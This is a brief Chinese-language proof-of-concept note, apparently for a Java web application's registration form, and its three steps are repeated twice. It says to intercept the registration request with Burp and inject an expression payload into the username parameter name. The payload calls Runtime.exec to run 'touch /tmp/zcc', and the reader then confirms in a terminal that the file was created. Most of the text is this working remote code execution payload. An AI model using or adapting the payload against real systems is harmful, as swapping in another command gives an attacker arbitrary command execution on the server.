(1)填写注册信息,burp抓包
(2)添加poc
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/zcc")]=&password=&repeatedPassword=
(3)进入终端查看,可以看到成功写入
(1)填写注册信息,burp抓包
(2)添加poc
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/zcc")]=&password=&repeatedPassword=
(3)进入终端查看,可以看到成功写入